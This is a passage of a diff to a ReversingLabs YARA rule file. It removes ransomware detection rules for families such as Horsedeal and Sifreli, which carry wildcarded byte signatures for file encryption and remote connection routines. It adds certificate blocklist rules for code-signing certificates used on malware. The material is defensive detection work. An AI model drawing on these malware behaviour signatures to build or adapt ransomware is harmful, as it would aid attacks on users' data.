-            ?? ?? ?? ?? 8B F3 EB ?? FF 15 ?? ?? ?? ?? 8B F0 53 6A ?? 8D 4C 24 ?? E8 ?? ?? ?? ??
-            8B C6 EB ?? 53 6A ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 33 C0 8B 8C 24 ?? ?? ?? ?? 64 89 0D
-            ?? ?? ?? ?? 59 5F 5E 5B 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$reboot = {
-            55 8B EC 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 56 8D 45 ?? 50 6A ?? FF 15 ?? ?? ??
-            ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 33 C0 EB ?? 8D 45 ?? 33 F6 50 68 ?? ?? ?? ?? 56
-            FF 15 ?? ?? ?? ?? 56 56 56 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 56 FF 75 ?? C7 45 ?? ??
-            ?? ?? ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 6A ?? FF 15
-            ?? ?? ?? ?? F7 D8 1B C0 F7 D8 8B 4D ?? 33 CD 5E E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Xin Zhou" and pe.signatures [ i ] . serial == "07:47:f6:a8:c3:54:2f:95:4b:11:3f:d9:8c:76:07:cf" and 1474329600 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_2572B484Fa0A61Be7288D785D7Bda7D3 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "b1d71baa-9100-512d-91f4-7286a740e5f2"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L14602-L14618"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "d6b23ba706a640a1e76ad7ab0a70c845c9366ac8355eea5439f76f6993c9c6be"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( ( $deploy_components ) and ( $get_shares_info ) and ( $encrypt_discs ) ) or ( ( $extract_diskcryptor_from_resources ) and ( $create_diskcryptor_service ) and ( all of ( $encrypt_files_using_diskcryptor_p* ) ) and ( $reboot ) ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SILVA, OOO" and pe.signatures [ i ] . serial == "25:72:b4:84:fa:0a:61:be:72:88:d7:85:d7:bd:a7:d3" and 1495152000 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Horsedeal : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_6726Bd04204746C46857887F : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Horsedeal ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "c722bc5b-756e-5d46-8530-e20ebb73737c"
-		date = "2020-10-01"
-		modified = "2020-10-01"
+		id = "ef882d82-f535-57c3-9d45-8d47ecc7f607"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Horsedeal.yara#L1-L106"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "fa8c425b08606399b5dc7673f3898e3dba7efb6a62e56db8f500cf5072bb590b"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L14620-L14636"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "11d25dff7e05e6f97725e919cc6c978d7f2e64a91cf04b72461c71d592dfc2dc"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Horsedeal"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$search_processes = {
-            55 8B EC 81 EC ?? ?? ?? ?? 56 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 74 ?? 8D
-            85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 53
-            FF 35 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF B5 ?? ?? ??
-            ?? 50 6A ?? FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 74 ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 53 FF
-            15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 5B 56 FF 15 ??
-            ?? ?? ?? 5E C9 C3
-        }
-		$enum_resources = {
-            55 8B EC 83 E4 ?? 83 EC ?? 83 0C 24 ?? 8D 44 24 ?? 53 56 57 50 FF 75 ?? C7 44 24 ??
-            ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 4C 24 ?? E8 ?? ?? ??
-            ?? 8B F0 85 F6 74 ?? EB ?? 33 DB 39 5C 24 ?? 76 ?? 8D 7E ?? F6 47 ?? ?? 74 ?? 8D 47
-            ?? 50 E8 ?? ?? ?? ?? EB ?? FF 37 E8 ?? ?? ?? ?? 43 83 C7 ?? 59 3B 5C 24 ?? 72 ?? 8D
-            44 24 ?? 50 56 8D 44 24 ?? 50 FF 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B CE E8 ??
-            ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3
-        }
-		$find_files = {
-            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 80 3D ?? ?? ?? ?? ?? 53 56 8B 35 ?? ?? ?? ?? 57
-            8B 7D ?? 74 ?? 68 ?? ?? ?? ?? 57 FF D6 85 C0 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8B D8 85 DB 0F 84 ?? ?? ?? ?? 57 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF 15 ??
-            ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 50 53 FF 15 ?? ?? ?? ?? 89 44 24 ?? 83 F8 ?? 0F 84 ??
-            ?? ?? ?? FF 35 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ??
-            8D 44 24 ?? 50 57 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B 44 24 ?? 83
-            C4 ?? A8 ?? 74 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 74 ?? 68 ?? ?? ?? ?? 8D
-            44 24 ?? 50 FF D6 85 C0 74 ?? 53 E8 ?? ?? ?? ?? 59 EB ?? 8B 44 24 ?? A8 ?? 74 ?? 68
-            ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 8D 44 24 ??
-            50 FF D6 85 C0 74 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 74 ?? 8B CB E8 ?? ??
-            ?? ?? 8D 44 24 ?? 50 FF 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 74 24
-            ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ??
-            ?? ?? 83 C4 ?? 33 FF 57 68 ?? ?? ?? ?? 6A ?? 57 6A ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ??
-            ?? ?? 8B F0 89 74 24 ?? 83 FE ?? 74 ?? 57 8B 3D ?? ?? ?? ?? 8D 44 24 ?? 50 68 ?? ??
-            ?? ?? FF D7 50 68 ?? ?? ?? ?? 56 8B 35 ?? ?? ?? ?? FF D6 6A ?? 8D 44 24 ?? 50 FF 35
-            ?? ?? ?? ?? FF D7 8B 7C 24 ?? 50 FF 35 ?? ?? ?? ?? 57 FF D6 57 FF 15 ?? ?? ?? ?? 8B
-            CB E8 ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3
-        }
-		$encrypt_files_p1 = {
-            55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 56 8B 35 ?? ?? ?? ?? 57 FF 35 ?? ?? ?? ??
-            8B F9 89 7D ?? FF D6 FF 35 ?? ?? ?? ?? 8B D8 57 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 50 FF
-            D6 3B C3 0F 84 ?? ?? ?? ?? 6A ?? 59 33 DB 89 4D ?? 8B C3 88 9C 05 ?? ?? ?? ?? 40 3D
-            ?? ?? ?? ?? 72 ?? 8D 85 ?? ?? ?? ?? 50 51 FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0
-            0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B CB 89 45 ?? 8A 84 0D ?? ?? ?? ?? 88 44 0D ??
-            41 83 F9 ?? 72 ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 53 6A ?? 53 FF 35
-            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? 6A ?? 58 50 53 6A ?? 68 ?? ?? ?? ??
-            57 89 45 ?? FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? 83 65 ?? ?? 57 FF D6
-            8D 0C 47 83 E9 ?? 66 83 39 ?? 75 ?? FF 35 ?? ?? ?? ?? 2B CF 83 C1 ?? D1 F9 8D 04 4F
-            50 FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 74 ?? FF 35 ?? ?? ?? ?? FF D6 FF 75 ?? 8B F0 FF
-            15 ?? ?? ?? ?? 3B C6 75 ?? 33 F6 46 EB ?? 8B 75 ?? 8D 45 ?? 50 53 FF 15 ?? ?? ?? ??
-            8B 4D ?? 8B 45 ?? 85 C9 7F ?? 7C ?? 3D ?? ?? ?? ?? 77 ?? 33 F6 46 85 F6 74 ?? 8B 35
-            ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50
-        }
-		$encrypt_files_p2 = {
-            53 FF 15 ?? ?? ?? ?? 6A ?? FF 75 ?? 8D 55 ?? 6A ?? FF 75 ?? 8D 8D ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8B 45 ?? 83 C4 ?? F7 D8 99 6A ?? 6A ?? 52 50 53 FF D7 6A ?? 8D 45 ?? 50 FF
-            75 ?? 8D 85 ?? ?? ?? ?? 50 53 FF D6 81 7D ?? ?? ?? ?? ?? 74 ?? E9 ?? ?? ?? ?? 6A ??
-            6A ?? 51 0F 57 C0 50 66 0F 13 45 ?? E8 ?? ?? ?? ?? 8B 4D ?? 2D ?? ?? ?? ?? 8B 35 ??
-            ?? ?? ?? 8B 3D ?? ?? ?? ?? 83 DA ?? 89 45 ?? 8B 45 ?? 2D ?? ?? ?? ?? 89 55 ?? 89 45
-            ?? 8D 45 ?? 83 D9 ?? 89 45 ?? 89 4D ?? 6A ?? 6A ?? FF 70 ?? FF 30 53 FF D7 6A ?? 8D
-            45 ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 6A ?? FF 75 ?? 8D
-            55 ?? 6A ?? FF 75 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? F7 D8 99 6A
-            ?? 6A ?? 52 50 53 FF D7 6A ?? 8D 45 ?? 50 FF 75 ?? 8D 85 ?? ?? ?? ?? 50 53 FF D6 8B
-            45 ?? 83 C0 ?? 83 6D ?? ?? 89 45 ?? 75 ?? 8B 7D ?? 0F 57 C0 6A ?? 6A ?? 66 0F 13 45
-            ?? FF 75 ?? C7 45 ?? ?? ?? ?? ?? FF 75 ?? 53 FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 6A
-            ?? 8D 45 ?? 50 53 FF D6 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 53 FF
-            D6 53 FF 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 85 F6 74 ?? 68 ?? ?? ??
-            ?? 57 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 83 C4 ?? 56 57 FF 15 ?? ??
-            ?? ?? 8B CE E8 ?? ?? ?? ?? 5F 5E 5B C9 C3
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BIG JOURNEY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "67:26:bd:04:20:47:46:c4:68:57:88:7f" and 1474352405 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_4463D8B31E0F87C14233D4D0D2C487A0 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "eefd6fa2-7ed7-51d0-bddd-90f0727a93cc"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L14638-L14654"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "04ce664fceb4a617294e860d5364d8a4ce8e055fd2baebb8be69f258d9c70ac7"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $enum_resources ) and ( $search_processes ) and ( $find_files ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yu Bao" and pe.signatures [ i ] . serial == "44:63:d8:b3:1e:0f:87:c1:42:33:d4:d0:d2:c4:87:a0" and 1477612800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Sifreli : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_387982605E542D6D52F231Ca6F5657Cc : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Sifreli ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "974f81e2-6907-54da-97e3-3116c41b5ed4"
-		date = "2020-10-08"
-		modified = "2020-10-08"
+		id = "2d5731e1-b18b-544e-ae14-40d70b679618"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Sifreli.yara#L1-L119"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "48f6cc678bea81afece0ae203fb27b61e2c6e4f7188a3bd260190f568c9a8a06"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L14656-L14672"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "d55cfd45bc0d330c0ed433a882874e4633ffbaa0d68288bea9058fe269d75ed9"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Sifreli"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files = {
-            55 8B EC 83 EC ?? 53 56 57 8B 7D ?? 8B C7 8D 50 ?? 66 8B 08 83 C0 ?? 66 85 C9 75 ??
-            2B C2 D1 F8 8D 44 00 ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 50 A1 ?? ?? ?? ??
-            6A ?? 50 FF D6 8B D8 89 5D ?? 85 DB 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 53 FF 15 ??
-            ?? ?? ?? 8B 0D ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 51 FF D6 8B F8 85 FF 0F 84 ?? ?? ??
-            ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? E8 ?? ?? ?? ?? 3D ?? ??
-            ?? ?? 1B C0 40 A3 ?? ?? ?? ?? EB ?? A1 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 57 50 53 FF 15
-            ?? ?? ?? ?? 89 45 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 90 F6 07 ?? 74
-            ?? BB ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 47 ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66
-            8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 33 DB EB ??
-            1B C0 83 D8 ?? 85 C0 74 ?? B9 ?? ?? ?? ?? 8D 47 ?? 8D 49 ?? 66 8B 10 66 3B 11 75 ??
-            66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0
-            EB ?? 1B C0 83 D8 ?? 85 C0 74 ?? 8B 55 ?? 8B 4D ?? 52 8D 47 ?? 50 8B 07 50 53 68 ??
-            ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 8B 55 ?? 57 52 FF 15 ?? ?? ?? ?? 85
-            C0 0F 85 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 5D ?? EB ?? C7 45 ?? ?? ?? ??
-            ?? 8B 0D ?? ?? ?? ?? 57 6A ?? 51 FF 15 ?? ?? ?? ?? EB ?? C7 45 ?? ?? ?? ?? ?? 8B 15
-            ?? ?? ?? ?? 53 6A ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 5F 5E 5B 8B E5 5D C3 5F 5E B8 ??
-            ?? ?? ?? 5B 8B E5 5D C3
-        }
-		$remote_connection_p1 = {
-            55 8B EC 83 EC ?? 53 33 DB 8D 45 ?? 89 5D ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ??
-            8B 45 ?? 8B 4D ?? 56 57 50 51 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 74 ?? 8B 55 ?? 8B
-            4D ?? 52 57 E8 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 74 ?? 8B 45 ?? 6A
-            ?? 50 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B D6 E8 ?? ?? ?? ?? 85 C0 74 ??
-            C7 45 ?? ?? ?? ?? ?? 56 FF D3 8D 4D ?? 51 8D 55 ?? 52 6A ?? 57 C7 45 ?? ?? ?? ?? ??
-            C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 57 8B F0 FF D3 85 F6 74 ?? 8B 45 ?? 50 FF D3
-            8B 5D ?? 83 7D ?? ?? 8B 35 ?? ?? ?? ?? 74 ?? 8B 4D ?? 8B 15 ?? ?? ?? ?? 51 6A ?? 52
-            FF D6 8B 45 ?? 85 C0 74 ?? 50 A1 ?? ?? ?? ?? 6A ?? 50 FF D6 5F 5E 8B C3 5B 8B E5 5D
-            C3 8B C3 5B 8B E5 5D C3
-        }
-		$remote_connection_p2 = {
-            55 8B EC 83 EC ?? 56 57 68 ?? ?? ?? ?? 33 FF 57 57 57 57 FF 15 ?? ?? ?? ?? 8B F0 85
-            F6 74 ?? 8B 3D ?? ?? ?? ?? B8 ?? ?? ?? ?? 6A ?? 89 45 ?? 89 45 ?? 8D 45 ?? 50 6A ??
-            56 C7 45 ?? ?? ?? ?? ?? FF D7 6A ?? 8D 4D ?? 51 6A ?? 56 FF D7 6A ?? 8D 55 ?? 52 6A
-            ?? 56 FF D7 8B 45 ?? 8B 4D ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 50 51 56 FF 15 ?? ?? ??
-            ?? 8B F8 85 FF 75 ?? 56 FF 15 ?? ?? ?? ?? 8B C7 5F 5E 8B E5 5D C3
-        }
-		$remote_connection_p3 = {
-            55 8B EC 83 EC ?? 53 56 8B F0 33 C0 89 06 57 89 46 ?? 89 46 ?? 6A ?? 50 89 46 ?? 8D
-            45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 51 6A ?? BF ?? ?? ?? ?? 6A ?? 68 ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? 89 7D ?? 89 7D ?? 89 7D ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ??
-            ?? ?? ?? 8B 4D ?? 8B 1D ?? ?? ?? ?? 8D 4C 09 ?? 33 C0 85 C9 74 ?? 8B 15 ?? ?? ?? ??
-            51 50 52 FF D3 89 06 85 C0 0F 84 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? 51 52 50 E8 ?? ?? ??
-            ?? 8B 06 8B 55 ?? 33 C9 66 89 0C 50 8B 4D ?? 83 C4 ?? 85 C9 74 ?? 8B 45 ?? 66 83 38
-            ?? 75 ?? 83 45 ?? ?? 2B CF 89 4D ?? 85 C9 75 ?? 8B 55 ?? 8D 7C 0A ?? 8D 54 3F ?? 33
-            C0 85 D2 74 ?? 52 50 A1 ?? ?? ?? ?? 50 FF D3 8B 4D ?? 89 46 ?? 85 C0 74 ?? 51 8B 4D
-            ?? 51 83 C0 ?? 50 E8 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? 8B 4E ?? 52 8B 55 ?? 50 8D 44 51
-            ?? 50 E8 ?? ?? ?? ?? 8B 46 ?? B9 ?? ?? ?? ?? 66 89 08 33 D2 66 89 14 78 66 8B 45 ??
-            83 C4 ?? 83 7D ?? ?? 66 89 46 ?? 75 ?? 83 4E ?? ?? 5F 5E B8 ?? ?? ?? ?? 5B 8B E5 5D
-            C3 8B 36 85 F6 74 ?? 8B 0D ?? ?? ?? ?? 56 6A ?? 51 FF 15 ?? ?? ?? ?? 5F 5E 33 C0 5B
-            8B E5 5D C3
-        }
-		$encrypt_files_1 = {
-            8B C3 8D 50 ?? 66 8B 08 83 C0 ?? 66 85 C9 75 ?? 2B C2 D1 F8 57 8B F8 8D 4C 3F ?? 33
-            C0 85 C9 74 ?? 51 50 A1 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 56 8B F0 8B CB
-            2B F3 8D 9B ?? ?? ?? ?? 0F B7 11 66 89 14 0E 83 C1 ?? 66 85 D2 75 ?? B9 ?? ?? ?? ??
-            8D 34 3F 2B F1 03 F0 EB ?? 8D 49 ?? 0F B7 11 66 89 14 0E 83 C1 ?? 66 85 D2 75 ?? 5E
-            5F C3
-        }
-		$encrypt_files_2 = {
-            83 E8 ?? 53 56 57 8B DA 74 ?? 48 74 ?? 5F 5E 33 C0 5B C3 53 51 33 F6 E8 ?? ?? ?? ??
-            83 C4 ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 8B F0 33 FF 85 F6 74 ?? 56 53 FF 15 ?? ?? ?? ??
-            85 C0 74 ?? BF ?? ?? ?? ?? A1 ?? ?? ?? ?? 56 6A ?? 50 FF 15 ?? ?? ?? ?? 8B F7 5F 8B
-            C6 5E 5B C3 53 51 33 F6 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 8B F0 33
-            FF 85 F6 74 ?? 56 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? BF ?? ?? ?? ?? 8B 0D ?? ?? ?? ??
-            56 6A ?? 51 FF 15 ?? ?? ?? ?? 8B F7 5F 8B C6 5E 5B C3 ?? ?? 55 8B EC 8B 4D ?? 8B 41
-            ?? 83 F8 ?? 0F 8F ?? ?? ?? ?? F7 45 ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 40 53 89 41 ??
-            8B 45 ?? 83 E8 ?? 56 57 74 ?? 48 0F 85 ?? ?? ?? ?? 8B 7D ?? 33 F6 8D 9B ?? ?? ?? ??
-            8B 86 ?? ?? ?? ?? 50 57 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 83 C6 ?? 83
-            FE ?? 72 ?? 8B 5D ?? E8 ?? ?? ?? ?? 8B F0 85 F6 74 ?? 8B 4D ?? 51 56 E8 ?? ?? ?? ??
-            83 C4 ?? EB ?? 8B 41 ?? 83 E8 ?? 74 ?? 48 75 ?? 8B 75 ?? E8 ?? ?? ?? ?? EB ?? 8B 75
-            ?? 8B C6 E8 ?? ?? ?? ?? F7 D8 1B C0 F7 D8 85 C0 74 ?? 8B 5D ?? 8B FE E8 ?? ?? ?? ??
-            8B F0 85 F6 74 ?? 8B 7D ?? 8B 47 ?? 8B 0F 8B D6 E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 47 ??
-            85 C0 74 ?? 50 FF 15 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? 8B 45 ?? FF 48 ?? 5F 5E 5B B8
-            ?? ?? ?? ?? 5D C3
-        }
-		$encrypt_files_3 = {
-            8B C6 8D 50 ?? 66 8B 08 83 C0 ?? 66 85 C9 75 ?? 2B C2 D1 F8 83 C0 ?? 85 C0 7E ?? EB
-            ?? 8D 49 ?? 66 83 3C 46 ?? 74 ?? 48 85 C0 7F ?? 33 C0 C3 8D 44 46 ?? 85 C0 74 ?? 83
-            C0 ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? C3
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Jiang Liu" and pe.signatures [ i ] . serial == "38:79:82:60:5e:54:2d:6d:52:f2:31:ca:6f:56:57:cc" and 1475884800 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_E0134C41E7Eda6863C4Eee5B003976Dd : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "395c14fd-2fec-53ad-bc8e-2dd4bb3522d2"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L14674-L14692"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "fbe34baf52e3fa7d7cdfcfaef9b8851c4cbeb46d17eeade61750e59cf0c13291"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_* ) ) and ( all of ( $remote_connection_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "5000 LIMITED" and ( pe.signatures [ i ] . serial == "00:e0:13:4c:41:e7:ed:a6:86:3c:4e:ee:5b:00:39:76:dd" or pe.signatures [ i ] . serial == "e0:13:4c:41:e7:ed:a6:86:3c:4e:ee:5b:00:39:76:dd" ) and 1528070400 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Farattack : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_5B47A4739Dd8Ffe81D9B5307 : INFO FILE
 {
